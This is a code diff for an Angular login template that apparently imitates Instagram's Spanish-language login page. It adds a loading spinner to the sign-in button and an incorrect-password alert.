--- a/src/app/modules/onboarding/login/login.component.html
+++ b/src/app/modules/onboarding/login/login.component.html
@@ -108,7 +108,30 @@
                                                                     class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"
                                                                 >
                                                                     <button class="_acan _acap _acas _aj1-" type="submit" (click)="this.authService.signIn(username.value, password.value)" >
-                                                                        <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">Entrar</div>
+                                                                        <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
+                                                                            <ng-container *ngIf="!this.authService.textLogin">
+                                                                                <span>Entrar</span>
+                                                                            </ng-container>
+                                                                            
+                                                                            <ng-container *ngIf="this.authService.spinner | async">
+                                                                                <div class="" style="display: flex; justify-content: center; align-items: center;">
+                                                                                    <div class="spinner">
+                                                                                    <div class="bar1"></div>
+                                                                                    <div class="bar2"></div>
+                                                                                    <div class="bar3"></div>
+                                                                                    <div class="bar4"></div>
+                                                                                    <div class="bar5"></div>
+                                                                                    <div class="bar6"></div>
+                                                                                    <div class="bar7"></div>
+                                                                                    <div class="bar8"></div>
+                                                                                    <div class="bar9"></div>
+                                                                                    <div class="bar10"></div>
+                                                                                    <div class="bar11"></div>
+                                                                                    <div class="bar12"></div>
+                                                                                    </div>
+                                                                                </div>
+                                                                              </ng-container>
+                                                                        </div>
                                                                     </button>
                                                                 </div>
                                                                 <div class="_ab39">
@@ -128,6 +151,15 @@
                                                                     <button class="_acan _acao _acas _aj1-" type="button"><span class="_a04s _ab36"></span><span class="_ab37">Iniciar sesión con Facebook</span></button>
                                                                 </div>
                                                             </div>
+
+                                                            <!-- Message error login start -->
+                                                            <ng-container *ngIf="this.authService.errorLogin">
+                                                                <div class="_ab2z">
+                                                                    <p aria-atomic="true" id="slfErrorAlert" role="alert">Tu contraseña no es correcta. Vuelve a comprobarla.</p>
+                                                                </div>
+                                                            </ng-container>
+                                                            <!-- / Message error login end -->
+
                                                             <a
                                                                 class="x1i10hfl xjbqb8w x6umtig x1b1mbwd xaqea5y xav7gou x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz _ab2y _a6hd"
                                                                 href="/accounts/password/reset/"
